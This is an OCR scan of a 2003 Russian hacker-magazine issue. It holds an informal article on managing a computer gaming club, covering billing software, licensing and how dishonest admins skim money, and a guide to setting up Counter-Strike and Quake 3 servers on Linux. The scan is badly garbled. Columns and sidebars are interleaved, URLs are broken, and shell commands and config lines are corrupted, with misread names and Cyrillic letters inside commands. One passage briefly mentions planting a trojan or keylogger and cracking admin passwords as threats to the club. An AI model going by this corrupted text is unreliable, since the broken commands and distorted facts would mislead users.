ли в клиенте есть что-то вроде RAdmin, 
чтобы админ не отвлекался по пустякам и 
не бегал по залу. Правда, эту фишку на- 
чальник может применить и против самого 
админа, например, проверить, не смотрит 
ли он порнуху вместо работы :). 

Второй тип функций - это учет и статисти- 
ка. Самая грустная часть для админов, ибо 
из-за нее они не имеют возможности тырить 
баблос, по крайней мере много :). В идеале 
каждая финансовая операция (посадил че- 
ловека на машину, добавил ему времени, 
включил интернет и другие) должная сопро- 
вождаться проводкой по кассе и выбивани- 
ем чека. Но это в идеале. Представляешь, 
какой это геморрой писать взаимодействие 
с кассовым аппаратом, с учетом того, что их 
достаточно много, и они неслабо стандарти- 
зированы. Но и без этого начальство любит 
сверять статистику по программе с отчетом 
по кассе. Хорошо, если отделаешься недос- 
тачей :). Соответственно в программе долж- 
ны быть учтены все цены и тарифы. Ночные 
и дневные тарифы (и утренние тарифы, в 
клубах они появляются все чаще - слишком 
много народу забивает школу :)), цены в 
будние дни и в выходные дни, тарифы для 
VIP-30HbI и всевозможные комбинации :). 

У нас есть халявщики? Значит, и их нуж- 
но учесть, причем желательно отдельно, 
чтобы знать, сколько насидела команда 


RTFM/UTO НАША ЖИЗНЬ? GAMEZ! 


Наш любимый клуб :) 


клуба (и не стоит ли выгнать их на 
фиг, а то еще ни один турнир не 
выиграли, одни убытки от них :)), 
сколько админы и родственники 
начальства :). 

В клубе есть дисконтные карты или 
льготы? Это все тоже нужно занести 
в программу. Можно ли в твоем клубе 
сидеть в кредит и кто имеет такое пра- 
BO? И это заносим в базу. Предостав- 
ляем ли мы услугу бронирования? Ко- 
нечно, головной боли от этого приба- 
вится, зато клиенты, живущие далеко, 
всегда смогут заказать компы, осо- 


лагается заполнить анкету о клубе - 
эти данные могут быть очень полез- 
ны, особенно если заполнение сти- 
мулировать :): например, pacnono- 
жить анкету на сфлаере со скидкой. 
С помощью этой информации мож- 
но серьезно оптимизировать работу 
клуба (а можно слить конкурентам и 
получить бабла :)). Естественно, что 
у обычных админов должен быть 
минимальный доступ ко всем этим 
функциям. То есть либо заводятся 
отдельные аккаунты, либо вся рабо- 
та со статистикой и учетом выполня- 


Способов мошенничества очень много - 
Остапы в нашей стране еще 
не перевелись Я расскажу лишь 
о самых уязвимых местах. 


бенно это популярно для ночных та- 
рифов. Только снимать бронь нужно 
вовремя :). А может быть, у нас есть 
постоянные клиенты или клубные кар- 
ты, для которых заводятся отдельные 
счета, суммы кредитов, именные льго- 
ты (скидки или специальные таридры). 
И это тоже нужно учесть. Неплохо бы 
учитывать дополнительные услуги 
(печать, сканирование, запись инфы 
на болванку, консультации админист- 
ратора :)), хотя это есть далеко He вез- 
ge. А когда начальство будет читать 
отчеты - вся информация должны 
быть четкой и наглядной, с возмож- 
ностью самому составлять необходи- 
мые виды отчетности. 

Раз в месяц (ну, можно и чаще) 
грамотный начальник просто обязан 
читать статистику, из которой мож- 
но узнать массу полезных вещей 
для дальнейшей работы. Например, 
загрузку клуба в различные часы и 
дни, расход трафика, самые попу- 
лярные тарифы, статистку по вы- 
ручке, данные по клиентам, статист- 
ку по сменам персонала (а не пора 
ли кого-нибудь увольнять :)), ста- 
тистику по отдельным машинам (мо- 
жет быть, стоит изменить их распо- 
ложение?) и многое другое. В неко- 
торых клубах пользователям Npeg- 


ется в отдельной программе, доступ 
к которой обычные админы не име- 
ют. Ну и совсем хорошо, если фи- 
нансовая часть будет отделена от 
всего остального, поскольку она ча- 
ще используется. 

Хорошо бы еще осуществить взаи- 
модействие с нормальной базой дан- 
ных ($541, естественно, упаси Боже от 
access :)). Существенно упростится 
изменение и внесение новой инфор- 
мации (можно даже написать отдель- 
ную прогу), составление отчетов 


(всего-то сделать правильную вы- 
борку), упростится взаимодействие 
различных частей системы (в базе 
можно хранить еще кучу другой нуж- 
ной инфы и легко передавать ее - sql 
и транзакции рулят), аеще можно 
улучшить модель безопасности - 
ведь в базе можно хранить и аккаун- 
ты всего персонала, а для доступа к 
базе тоже нужен пароль :). 


КУРСЫ ПОВЫШЕНИЯ 
КВАЛИФИКАЦИИ 

Перечитал предыдущий абзац и по- 
HAN: я уже не могу думать как ag- 
мин, я думаю как менеджер. Вот 
что значит один раз влезть в шку- 
ру врага :). Кстати, менеджер клуба 
- работа намного более веселая, 
чем администратор. К тому же 
вполне подходит человеку, кото- 
рый получает высшее образова- 
ние. Ты студент? Тогда оставь ра- 
боту админа старшеклассникам :). 
Ах, ты школьник... Ну, тогда следуй 
заветам Ильича - учиться, учиться 
иеще раз учиться :). Как же стать 
менеджером? Можно, конечно, дол- 
го работать в клубе, не воровать и 
не жульничать, иметь хорошие от- 
зывы... Через годик, может, и ста- 
нешь, хотя вряд ли. Реальнее стать 
менеджером в новом клубе, хотя и 
в этом случае неплохо хотя бы ме- 
сяц поработать где-нибудь прос- 
тым админом, причем желательно 
на той же системе, которая будет 
стоять в твоем клубе. Так ты лучше 
узнаешь работу и не дашь простым 
админам тебя обманывать. Тебе 
ведь тоже перед начальством нуж- 
но отчитываться :). В моем случае 
дело было так: однажды в клуб 
зашла этакая бизнес-леди, села в 
VIP-30HYy и вскоре начала активно 
требовать консультаций. Она меня 
порядком достала, но тут в моей 
руке оказалась хрустящая бумаж- 
ка. Люблю таких клиентов, чего 
для них не сделаешь :). Она захо- 
дила еще несколько раз, а потом 
рассказала, что хочет открыть 
собственный клуб, но плохо пони- 
мает в компьютерах. Вот он, мой 
звездный час ;). В итоге, правда, 


ane 


08(33) 2003 —n= 


Хакер Спец 
благодарит за 
помощь в на- 

писании статьи 
компьютерный 
клуб МеНапа, 
компьютер- 
ный клуб 
Astalavista и 
лично Сапешко 
Виктора 


Честно скажу, 
работа админа 
в игровом клу- 
бе - дело не из 

легких. 


Как правило, 
это полноцен- 
ная информа- 

ционная систе- 
ма с ведением 

статистики и 
учета, кассо- 
вых операций, 
ну и, конечно 

же, полным 
контролем над 
машинами и 
пользователя- 
ми. Если чего- 
то не хватает, 
значит, ты 
имеешь дело с 
самопальным 
творением 
местного прог- 
раммера :). 
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www.asta- 
lavista.ru - 
официальный 
сайт популяр- 
ной системы 
управления 
клубом. 


Не играй мно- 
го - глаза ис- 
портишь :). 
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Вот так выглядит админская консоль в Astalavista 


менеджером я так и не стал, появи- 
лись более заманчивые предложе- 
ния (более того, я даже не знаю, 
где она открыла клуб), но бизнес- 
план я честно составил и свои 
деньги за него получил :). Конечно, 
такие случаи бывают не часто, но 
они вполне реальны. 


КЛУБ ПОД ПЕРЕКРЕСТНЫМ 
ОГНЕМ 

Итак, представь, что тебе тоже по- 
везло, и скоро откроется твой 
клуб. Помещение уже есть, компы 
закуплены, остался только софт. 
Погоди, а какие оси ты собираешь- 
ся использовать? Ну, Линух мы 
можем отмести сразу - мы же игро- 
вой клуб делаем. Хотя, в принци- 
пе, для интернет-кафе может сго- 
диться и Линух. Только вот предс- 
тавь себе, как будут материться 
админы, уставшие объяснять каж- 
дому пользователю, куда тыкать 
мышой :). Винды - это наш выбор. 
Но какие? Удобнее всего поста- 
вить на клиентские тачки WinXP, а 
сервак сделать на Win2k. Поднима- 
ем Active Directory, домен, МАТ (06 
администрировании Win2k ты мо- 
жешь прочесть в этом номере), и 
все пучком. Админам настраиваем 
достаточно привилегированные 
аккаунты. А на клиентских тачках 
обрезаем права по полной: шаг 
влево, шаг вправо - попытка уле- 
теть :). Пароль администратора ос- 
тавляем себе - не стоит его никому 
давать, мало ли что. Только вот 
есть одна проблема: корпоратив- 
ные версии WinXP (ведь машин 
много) и Win2k сервер стоят go- 
вольно дорого. Ты ухмыляешься? 
А вот это зря! Очень много клубов 
были закрыты в первый месяц 
своего существования, когда к 
ним по наводке приезжал какой- 
нибудь ОБЭП. Хочешь ходить по 
лезвию ножа или постоянно да- 
вать взятки - пожалуйста, ставь 
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левые оси. В клубах же, где весь 
софт куплен легально, чаще уви- 
дишь что-нибудь из семейства 
Win9x и сервак Ha FreeBSD. Этот 
вариант, конечно, хуже - настраи- 
вать его сложнее. Да и права 
пользователей придется контро- 
лировать через клиент и реестр 
Виндов (есть в нем кое-какие по- 
лезные параметры), но все равно 
такую защиту можно обойти. Ад- 
минам придется активно контроли- 
ровать пользователей, а менедже- 
ру - админов :). Еще есть соблазн 
поставить проксю, но я хочу удер- 
жать тебя от этого шага. Да, инет 
ты, кончено, сэкономишь, но при- 
обретешь кучу головной боли. Во- 
первых, очень проблематично 
обеспечить взаимодействие прок- 
си и системы управления клубом 
(хотя в некоторых системах есть 
встроенная прокся). Во-вторых, ус- 
ложнится настройка машин. Ну и, 
в-третьих, очень сложно станет 
настроить некоторые игры на игру 


в интернете. Главным образом, это 
игры от Blizzard, использующие 
Battle.net. С CS и квакой все нем- 
ного легче, но лагает через прок- 
сю обычно дай Боже. Так что воз- 
мущения прогеймеров (а обычные 
игроки редко играют по инету) те- 
бе не избежать. Но на закупке 
осей дело не заканчивается. Ну- 
жен ведь еще и офис, и антивирус 
(желательно корпоративный). Ну 
и, конечно же, игры. Их не обяза- 
тельно покупать на каждый компь- 
ютер. Для гамес, в которые играют 
по интернету на официальных 
серверах (опять-таки в основном 
это игры от Blizzard: Diablo, 
Warcraft, Starcraft), необходимо 
достаточное число cd-key ‘eB. 
Штук десять, обычно, хватает. 


CONTROL THIS SHIT! 

Осталась система управления. Вари- 
антов два: или оплачиваем работу 
программисту, и он пишет систему 
под наш клуб с учетом его особен- 
ностей, или покупаем готовую. На 
мой взгляд, второй вариант лучше. 
Ведь пишется это все достаточно 
долго (кстати, большинство систем 
написаны Ha Delphi), a еще нужно 
тестировать и отлаживать. Согла- 
сись, использовать родимый клуб в 
качестве полигона не очень хоро- 
шая идея :). А если мы покупаем сис- 
тему, то нам ее установят и настроят, 
и сделают это достаточно быстро. К 
тому же предоставят техническую 
поддержку. Да и вообще, чем шире 
используется система, тем быстрее в 
ней находят и исправляют баги 
(представь, что админ случайно на- 
шел дыру и будет ею пользоваться 
втихую или программист оставил 
бэкдор), адаптируют под новые оси, 
железо, добавляют новые фишки и 
полезные функции (а тебе еще при- 


дется искать того кодера или нани- 
мать его на работу). Нет предела со- 
вершенству! Да и по деньгам полу- 
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Перечитал 
предыдущий 
абзац и понял: 
я уже не могу 
думать как ag- 
мин, я думаю 
как менеджер. 
Вот что зна- 
чит один раз 
влезть в шку- 
ру врага :). 


Только вот 
есть одна 
проблема: кор- 
поративные 
версии WinXP 
и Win2k cep- 
вер (ведь ма- 
шин много) 
стоят доволь- 
но дорого. Ты 
ухмыляешься? 
А вот это зря! 
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чается очень выгодно: использова- 
ние готовой системы всегда обходит- 
ся дешевле, чем написание новой, 
жаль только, начальство это не всег- 
да понимает :). Посуди сам, закупка 
такой известной и популярной в мос- 
ковских клубах системы, как 
Astalavista, обойдется всего в десять 
баксов за машину. А функций в ней - 
вагон и маленькая тележка. К тому 
же скоро выйдет новая версия, в ко- 
торой обещают новую концепцию и 
множество обновлений: от интегри- 
рования с системой видеонаблюде- 
ния 90 поддержки специальных карт. 
Сам ты такое писать будешь очень 
долго :). Хотя, если организация со- 
лидная и с деньгами проблем нет, 
можно и заказать написание своей 
системы (в крупных клубах, напри- 
мер, в Ме апа, стоит своя система). 
Тем более что потом можно ее и про- 
давать самому :). 


OCA И КИСА БЫЛИ ЗДЕСЬ 
Ну вот, работа клуба вроде налаже- 
на, приготовься к длительной и за- 
тяжной борьбе с посетителями и ag- 
минами :). Способов мошенничества 
очень много - Остапы в нашей стра- 
не еще не перевелись. Я расскажу 
лишь о самых уязвимых местах. 
Мошенничество пользователей 
особенно много вреда не принесет. 
Если, конечно, они не будут посто- 
янно переть мыши и наушники. 
Кстати, против этого у меня есть па- 
ра неплохих мыслей. Например, сде- 
лать гардероб и обязательную сда- 
чу вещей. Если клиенты страдают 
клептоманией, должно окупиться :). 
Админы - другое дело. Самое пар- 
шивое, что из-за нечистых на руку 
администраторов страдают другие 
админы, особенно новички. Тертый 
мошенник никогда не останется с 
недостачей, а вот повесить ее на 
другого - легко. Да и пользователи 
могут от них страдать. Распростра- 
ненный способ - вносить времени 
меньше, чем заплатил клиент. При- 
чем чем больше он взял времени, 
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тем на большую сумму его можно 
обмануть, особенно если к кассе 
подскочил взмыленный подросток с 
зажатыми в кулаке деньгами, зап- 
латил и побежал обратно играть в 
контру. Точно так же и с трафиком. 
Тщательнее проверяй статистику - 
если большинство пользователей 
вдруг стало брать неровное количе- 
ство часов (например, час и сорок 
пять минут), то, скорее всего, админ 
тырит время - юзеры часы не делят. 
Еще неплохой способ gna заработ- 
ка - это различные категории халяв- 
щиков. Деньги админ берет по пол- 
ной, а сажает, например, как члена 
команды клуба. Опять-таки в статис- 
тике такие вещи можно обнаружить. 
Далее - платная консультация клиен- 
тов. Не знаю, как к этому относиться. 
С одной стороны, это, конечно, свин- 
ство, а с другой - часто бывают кли- 
енты, на которых тратишь очень мно- 
го времени абсолютно без толку. Ну 
иеще лазейка - это предоставление 
дополнительных услуг - вроде печа- 
ти. Они редко проводятся через сис- 
тему, соответственно есть поле для 
заработка. Кстати, чем реже ты нахо- 
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Сайт Poligon-Kit 


дишься на работе, тем ленивее и наг- 
лее становятся админы. Кто-то стар- 
ший должен быть в клубе большую 
часть времени. Это должен быть ли- 
бо сам менеджер, пибо его доверен- 
ный человек. Не забывай, что систе- 
му можно и взломать. Ты снимаешь 
статистику с компа, к которому имеют 
доступ админы? Я бы поставил троян 
или кейлогер. Пароль администрато- 
ра на компьютерах такой же, как и в 
системе? Это то, что я проверил бы в 
первую очередь. Тем более что полу- 
чить его под локальной системой не 
так уж и сложно (вспомни тот же 
LOpht Crack). Да и брутфорс еще 
никто не отменял. Чем больше ты уч- 
тешь таких моментов, тем меньше не- 
ожиданностей будет потом. 

A ele совет: веди себя с персоналом 
по-человечески, тогда, может, никто и 
не будет испытывать судьбу :). 
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Ушаков Андрей 
aka A-nd-Y 
(Andy_@timus.ru) 


данном случае требования к 
оси и железу несколько от- 
| личаются от требований 

клиентской части, ведь сервер выполняет 
иные задачи, нежели клиент, а именно: 
позволяет игрокам взаимодействовать 
друг с другом при определенных смодели- 
рованных условиях, например, на опреде- 
ленной карте, и следить за ними. Серваку 
для этого не надо обсчитывать тяжелен- 
ную rpacpuky, а игроку не надо учиться 
работать с пингвином - виндовый клиент 
и никсовый сервер прекрасно общаются 
друг с другом по фирменному игровому 
протоколу. 


ПОЧЕМУ ЛИНЬ? 
Итак, почему же все-таки именно Линух, а 
не Винда? Причин может быть минимум три: 


1. У тебя уже есть тачка под Линухом, 
которая выполняет функции ftp или веб- 
сервера, да и загружена она далеко не 
полностью, а для игр ставить второй комп 
накладно. 

2. Линь более надежен. Даже если твой 
игровой сервак по какой-либо причине 
упадет, он не утащит за собой всю ось, 
что запросто может произойти в Винодах, и 
ты сможешь удаленно поднять его обрат- 
но, не бегая к компу с большим ресетом :). 

3. Тебе не нужно будет беспокоиться о 
законности используемого софта, о ли- 
цензиях и т.п. Линукс - свободная ось, 
многие ее дистрибутивы распространяют- 
ся бесплатно. И не надо орать, что в на- 
шей пиратской стране - это не актуально! 
Для компьютерного клуба это еще как ак- 
туально! А покупать лицензии на Винду у 
дяди Билла за немалую сумму зеленых - 
это облом, а тут все абсолютно чисто, да 
и качество на уровне. 

Сразу отмечу, что пока далеко не все 
дистрибутивы игровых серверов сущест- 
вуют под Линукс, поэтому иногда альтер- 
нативы Виндам может и не оказаться, но 
ситуация постоянно меняется в лучшую 
сторону. 

Я не буду говорить о такой вещи, как бе- 
зопасность Nix* систем - вопрос довольно 
спорный, многое зависит от дырок самого 
игрового сервака, мастерства кул хакера, ну 
и от твоей головы, конечно. Практика пока- 


зывает, что часто никсы настроены так, что 
сломать их не составляет особого труда, и 
дело тут именно в админе, а не в самой оси. 
Хотя немаловажную роль здесь сыграли 
юзерориентированные дистрибутивы, где о 
“secure by default", похоже, забыли. 


BO ЧТО ИГРАЮТ? 
Если ты заядлый геймер или админ компь- 
ютерного клуба, то тебе нет смысла рас- 
сказывать, во что сейчас играют больше 
всего, но если ты только решил поставить 
пару игровых серваков в локалке или за- 
няться организацией собственного клуба, 
кратко напомню несколько самых попу- 
лярных сетевых игрушек на данный мо- 
мент. Counter-Strike, Quake 3, Diablo, 
Warkraft, Ultima Online, Unreal Tournament, 
Soldier of Fortune, etc. Сервера части из 
этих игрушек доступны и под Линухом. 
Уверен, что, установив сервера для этих 
игр, ты обеспечишь популярность своему 
клубу или локальному серваку. 


МЕТАЛЛОЛОМ 

Ты, конечно же, спросишь, какое железо 
понадобится для игрового сервера. Тут 
все пропорционально нагрузке на него. 
Если ты планируешь просто поиграть со 
своими друзьями по локалке и макси- 
мальное количество юзеров ограничива- 
ется 5-7, то тебе хватит тачки с процем ~ 
300 МГц и оперативкой 128 мег (хотя 


один мой знакомый говорил, что 
сотый пень вполне сносно тянул CS 
сервак при 5 игроках). Если же иг- 
роков планируется больше, то оп- 
тимально будет решение на про- 
цессоре 800-1000 МГц и 256 опе- 
ративки (лучше DDR). Многие так- 
же рекомендуют использовать про- 
цессоры от AMD серии ХР в сочета- 
нии с DDR памятью. А вообще, 
здесь можно руководствоваться 
принципом: чем больше, тем луч- 
ше, особенно, если есть перспекти- 
ва роста числа играющих на твоем 
сервере. Ну и не стоит забывать о 
наличии надежных каналов связи. 
Вовремя подумав о железе, ты в 
дальнейшем избавишься от жалоб 
игроков на тормоза и зависания. 


ПОДГОТОВКА 

Перед установкой сервера реко- 
мендую тебе сделать некоторые 
приготовления в системе, а именно 
- создать отдельную директорию 
для каждого игрового сервака, а 
также завести несколько отдель- 
ных юзеров, под которыми ты бу- 
дешь их запускать. 

Почему нужен отдельный юзер? 
Это вопрос безопасности системы. 
Если сервер попытаются хакнуть, 
то злоумышленник получит права 
только того юзера, от имени кото- 
рого запущен сервант. Думаю, ты 
догадаешься, что будет, если сер- 
вер запущен под рутом. 


НОМ/ИТО/ИГРАЕМ НЕ ПО-ДЕТСК 


http://server.counter-strike.net 


самим сервером, останутся только 
в рамках прав отведенного юзера и 
не затронут чужие файлы. 


COUNTER-STRIKE 

Одна из самых популярных игру- 
шек на данный момент. Ее сервер 
есть и под Линух. Напомню, что 
сервер Counter-strike - это 
надстройка для сервера Half-Life, 
поэтому сначала тебе придется ус- 
тановить сервер Half-Life (hlds - 
Half-Life dedicated server), а на него 


Пока далеко не все дистрибутивы игровых 
серверов существуют под Линукс, поэтому 
при выборе тобой определенных игр аль- 
тернативы BUHGAM может и не оказаться, 
но ситуация меняется в лучшую сторону. 


Ну и вторая причина - стабиль- 
ность системы: могут произойти 
различные аварийные ситуации, 
при которых есть вероятность неп- 
редвиденного повреждения каких- 
либо файлов, в том числе и систем- 
ных (случаи с полным обнулением 
довольно важных конфигов при 
непредвиденных ребутах уже слу- 
чались в моей практике). В нашем 
же случае мы уменьшим вероят- 
ность таких ситуаций, ведь воз- 
можные повреждения, вызванные 


Запускаем С$ сервер... 


уже - Counter-strike сервер 

(Counter-strike dedicated server). 
Сливаем hids_ 1310. tar. по линке: 
ittp://server.count net 


antral afiledb nhr cti Nn: t Ч ) 
(весит это чудо 6. 3 wera) и 15051 по 
линке: ВЁр://м er-strike.n 

linux_ i (@eeur тоже немало - 
107 в 

Теперь поставим HLDS. Я отмечу 
лишь наиболее важные НЫ ус- 
тановки - на сайте ht 

Nadeagle.ru есть Е ру- 
ОЕ по установке CS и HL 
серверов на русском языке, поэто- 
му нет смысла их повторять пол- 
ностью, да и мелочей, которые нуж- 
но учесть, слишком много, чтобы 
уместить в одну статью. 

Дистрибутив HLDS копируем в 
созданную для него директорию и 
распаковываем архив: 


tar -xzvf hids_I3110.tar.gz 
В нашей директории появится пап- 
ка hids_l, в которой и будут находить- 


Пишем скриптину 


ся все файлы игрового сервера. Да- 
лее распакуем архив с сервером С$ в 
директорию hids_! - в hids_! появится 
дира cstrike. Итак, тут у нас валяются 
различные сфайлы, кратко поясню 
назначения некоторых из них. 
hids_I/cstrike/server.cfg - 
собственно главный конфиг серва- 
ка, здесь задаются основные пара- 
метры его работы. Все доступные 
переменные можно ин на 
сайте сервера по линке: 


ttr 


unter-strik inds 

“hids ее mote txt О 
message of the day) - файл содер- 
жит текст сообщений, которые бу- 
дут выводиться на экран при подк- 
лючении к серверу. Сюда пиши все, 
что считаешь нужным сообщить 
своим посетителям. 

hids_I/cstrike/mapcycle.txt - конфиг 
для используемых карт Ha сервере. 

Каталог №4$_И/сзКе/тарэ/ - co- 
держит файлы карт сервера. 

С конфигами, надеюсь, ты разбе- 
решься. Сейчас нужно создать 
скрипт запуска твоего сервера со 
следующим содержанием: 


#1/bin/sh 

GAMESDIR=/home/game 

export GAMESDIR 
LD_LIBRARY_PATH=SGAMESDIR/hI/hIds_I:SLD_ 
LIBRARY_PATH 

export LD_LIBRARY_PATH 

hids_run -game cstrike +ip 212.23.95.152 
+maxplayers 10 +map cs_estate 


Здесь -game cstrike задает, что иг- 
рать будем именно в С$ (надстрой- 
ки для HL есть и другие), +ip host 
задает ip твоего сервака, +тахр/ау- 
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igamers.cor 
= отличный 
сайт, посвя- 
щенный играм, 
здесь ты най- 
дешь множест- 
во полезной 
информации, в 
том числе и 
об игровых 
серверах. 


если ты` решил 
взяться за С$, 
то тебе непре- 
менно нужно 
будет посе- 
тить этот 
сайт. Файлы, 
руководства, 
новости прису- 
тствуют здесь 
в изобилии. 


улому UDO 


НО\МИТО/ИГРАЕМ HE ПО-ДЕТСКИ 


ОСи 4work 


wa п = ин- 
формация и 
филесы из 
первоисточни- 
ков. 


Если ты пла- 
нируешь орга- 
низовать игро- 
вой клуб, тебе 
придется 
стать посто- 
янным посети- 
телем сайта 


Один из лучших русских сайтов по CS 
и его администрированию 


ег$ 10 - максимальное количество 
игроков, +тар ХХХХ - выбранную 
карту ХХХХ. 

Не забудь задать права на испол- 


нение для созданного скрипта. 
Скрипт можно было и не создавать, 
но тебе бы пришлось вводить все 
эти команды вручную постоянно 
при каждом новом запуске сервера. 

Надеюсь, что ты не забыл, что все 
эти действия нужно производить из- 
под созданного тобой для этой цели 
юзера. Осталось запустить сервер. 
Если никаких ошибок не выдано, то 
считай, что все встало удачно. 

Сейчас твоя задача - более тон- 
кая настройка сервера, которая бу- 
дет происходить уже в ходе работы 
сервера и при возникновении конк- 
ретных ситуаций. 


QUAKE 3 ARENA 

Тоже далеко не последняя игрушка 
в рейтингах популярности. Тянем 
дистрибутив сервака по линке: 


que 


linux/linuxg3ded-1.27g- 
al.tar.gz. Установка сервера q3 
не составляет особого труда, если 
ты хоть в какой-то степени знаком 
с *nix системами. Сервер поставля- 
ется в виде бинарника, поэтому 
компилить ничего не нужно. 

Создадим директорию под назва- 
нием, например, а3 и вложенную в 
нее директорию baseq3: 


mkdir -р SGAMESDIR/q3/baseq3. 


Далее распакуем бинарник серва- 
ка в директорию 03: 


tar -xzf linuxq3ded-1.27q-betal.tar.gz. 


После чего находим дистрибутив с 
игрушкой Quake 3 и копируем из не- 
го файлы PakO.pk3, РаК1.ркЗ, 
Pak2.pk3, Pak3.pk3, Pak4.pk3 в корне- 
вую директорию нашего сервера 
(43). Далее запускаем файл сервера: 


sh filename 


После этого в директории появят- 
ся некоторые файлы, главный кон- 
фиг - config.cfg - будет находиться в 
директории baseq3. Приведу некото- 
рые параметры настройки сервера: 


set g_gametype 0 - устанавливает 
тип игры, О - разрешено gna всех; 


me 
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set fraglimit 0 - количество cppa- 
гов; 

set timelimit ХХ - устанавливает 
продолжительность игры, где ХХ - 
время в минутах; 

set sv_maxclients XX - задает Mak- 
симальное количество игроков, XX 
- число игроков; 

set server servername - задает имя 
сервера servername; 

set g_motd “motd” :) - сообщения 
перед началом игры; 

set rconpassword “pass” - 
собственно админский пасс на rcon; 

set bot_enable 1 - включаем ботов; 

addbot uriel 3 100 - добавляем бо- 
та и задаем его параметры, вписы- 
вай аналогичную строку для каж- 
дого бота; 

set “Administrator” “адт-пате”, 
set “Email” “adm@mail, set “URL” 
“http://q-admin.com", set “Location” 
“server-info", set “CPU” “hw-info” - 
устанавливает инфу о серваке и 
его админе. 


Это лишь малая часть параметров 
из конфига Q3, но, думаю, проблем с 
его правкой у тебя возникнуть не 
должно. А вообще, можешь поискать 
готовый конориг в Инете. Теперь 
можно запускать сервер командой: 


./q3ded +set dedicated 1+set +exec config.cfg 


если ты находишься в директории 
Q3, куда мы установили сервер. 
Для упрощения жизни и избавле- 
ния от ввода огромных команд ре- 
комендую вписать команду в 
скрипт с приятным названием, нап- 
ример, q3start. 

Создай текстовый файл следую- 
щего содержания (воспользуемся 
программой cat): 


$ cat > q3start 
#!/bin/sh 
GAMESDIR=/home/game 
export GAMESDIR 


ОЗ сервант в действии 


SGAMESDIR/q3/q3ded +set dedicated 1 +ехес 
config.cfg 


где +set dedicated 1 - указывает 
тип запуска сервера, +ехес 
config.cfg - указывает тот конфиг, 
который следует использовать. 


Нажми “Ctrl + С" для завершения 
ввода. Далее назначай права на 
исполнение gna твоего скрипта: 


chmod +x q3start 


После этого ты сможешь запус- 
кать сервер простой командой из 
каталога сервера: 


/q3start 


Удобства на лицо :). Если ошибок 
при запуске не возникло, то могу 
тебя поздравить, сервер работает. 
Если что-то не так, проверь конфиг 
еще раз. Как правило, многие проб- 
лемы скрываются именно в ошиб- 
ках конфига. 


SCREEN ИЛИ BACKGROUND? 
При запуске сервака, в частности, 
CS, ты, наверное, обратил внима- 
ние, что работает он только пока 
открыт терминал, в котором ты от- 
дал команду на запуск сервера, при 
закрытии же терминала процесс 
сервера прекращается. Здесь нет 
ничего удивительного - терминал 
при завершении своей работы уби- 
вает все дочерние процессы. Пос- 
тупить в данной ситуации можно 
следующим образом: 

Первый способ - использовать 
так называемый Screen. Screen - 
специальный экранный менеджер с 
эмуляцией терминала, который поз- 
воляет сохранять сессию, то есть 
все процессы, которые ты запустил 
в нем, и при последующем подклю- 
чении продолжить работу с запу- 
щенными приложениями. Это мо- 


жет быть удобно, если ты адми- 
нишь сервак удаленно и время от 
времени подключаешься к нему, 
чтобы отдать важные админские 
команды. 

Скачать Screen (если его нет в 
твоем дистрибутиве) можно по 
ссылке: htt www.gnu.org/soft 
ware/screen/screen.html Там же ты 
найдешь и документацию к нему. 

Пример использования: 


screen -А -d -т -S Mysession com- 
mand - запускаем команду сот- 
mand в screen, где опция -А - nogro- 
няет размер окон под размер теку- 
щего терминала, -т -d - запускает 
новую сессию в detatch режиме 
(рекомендуется для стартовых 
скриптов), -S Mysession - задает 
имя для данной сессии. 

screen -г Mysession - возобновля- 
ем сессию Mysession в screen. 

screen -list - показать процессы, 
запущенные под screen’oM. 


Ну и второй способ - можно за- 
пустить сервант в фоновом режи- 
ме, добавив в конец команды за- 
пуска amnepcang (&). Таким обра- 
зом, ты переведешь его в фоновый 
режим (background), но в то же Bpe- 
мя потеряешь доступ к консоли уп- 
равления сервером. Поэтому тебе 
придется позаботиться об установ- 
ке дополнительных утилит админи- 
стрирования. Выбирай сам, какой 
способ для тебя удобнее. 


АДМИНИМ 

Если твой сервер уже настроен, то 
он практически не потребует от те- 
бя особого внимания, проблемы 
возникнут при администрировании 


Правим конфиг для Q3 


НОМ/ТО/ИГРАЕМ НЕ ПО-ДЕТСК 


Gamehdmins сот. 


a пн: рав Г ТН, в 


Надеюсь, ты будешь здесь частым посетителем :) 


сервера для (или против :)) конеч- 
ного пользователя. 

Среди твоих задач будут смена 
карт, контроль доступа участни- 
ков, резервирование слотов, сле- 
жение за порядком, ведь геймеры 
бывают разные, есть и такие, кото- 
рые не прочь попортить жизнь 
другим. Об этом стоит задуматься 
сразу, тем более, если ты ставишь 
сервак в клубе. Оперативные и 
брутальные меры против читеров 
только прибавят уважения тебе и 
твоему клубу. 


Тебе будут доступны различные 
средства администрирования. 
Практически у каждой игры есть 
так называемая консоль (RCON), 
которая позволяет управлять рабо- 
той сервера с помощью текстовых 
команд, но существуют и утилиты, 
призванные упростить задачи ад- 
министрирования. 

Доступные команды гсоп можно 
найти в руководстве для каждого 
сервера. Для администрирования 
С5 сервера можешь попробовать 
HL Admin Mod, AmxMod, himonitor. 
Их установка вполне стандартна и 
прекрасно описывается в соответ- 
ствующих README файлах, так 
что не буду на этом останавли- 
ваться. 

Для Quake 3 попробуй The-All- 
Seeing Eye и Server Watch. 


ЧТО ЕСТЬ ЕЩЕ? 

Под Линуксом можно запустить 

также серваки следующих игр: 
Neverwinter Nights 

(http://www.3dgame 


Elite Force (ht 


Battlefield (http://\ 


Unreal Tournament 


unrealtournd/3 


Return to Castle Wolfenstein 
(http://www.wolfensteinx.con 
|. 1p?file=wolflinu ); 

tar Wars Jedi Knight II 


Их установка во многом сходна с 
описанной установкой серверов CS 
и Q3 и сводится, по большей части, 
к копированию файлов в директо- 
puto сервера и написанию конфига, 
поэтому повторяться нет смысла. 
Особенности для каждого сервера 
прекрасно описаны на сайтах про- 
изводителей и в документации, 
идущей с самим сервером. 


Вот ты и узнал, что минимально 
следует учесть при установке игро- 
вого сервера под Линуксом. Самим 
фактом выбора Линуха как плат- 
формы для игрового сервака ты 
уже заслужил большой респект. 
Удачи тебе на пути продвинутого 
дате-админа :). 


Линукс и игры 
несовместимы? 


водители начи- 


платформу Ли- 


пускается мно- 


причем с мини- 


водительности, 


случаях даже и 


улому UDO 


Ты постоянно 
слышишь, что 


Так знай, это 
совсем не так. 
Многие произ- 


нают перено- 
сить (кто-то 
уже перенес) 
свои игры на 


нуха, да и че- 
рез Winex за- 


жество виндо- 
вых игрушек, 


мальными по- 
терями произ- 


а в некоторых 


с выигрышем. 
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HOWTO/WIN2KSERV - ДОРОГА В AD 


ОСи 4work 


Win2k - это 
очередная 
“cynep6e30- 
пасная"' cep- 
верная ось OT 
компании 
Microsoft. 


Пользователь 
Василий ле- 
жит в контей- 
нере гостей, 
который, в 
свою очередь, 
лежит в кон- 
